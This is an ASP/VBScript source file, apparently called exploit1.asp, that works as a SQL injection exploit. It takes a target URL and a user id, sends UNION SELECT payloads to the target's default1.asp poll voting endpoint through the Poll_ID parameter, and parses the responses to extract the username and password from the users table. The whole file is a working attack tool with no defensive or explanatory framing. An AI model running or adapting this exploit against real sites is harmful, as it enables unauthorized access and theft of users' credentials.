<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "There is a problem! Please complete to the whole spaces"
End If
If islem = "hata2" Then
Response.Write "There is a problem! Please right character use"
End If
If islem = "hata3" Then
Response.Write "There is a problem! Add ""http://"""
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question: " )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>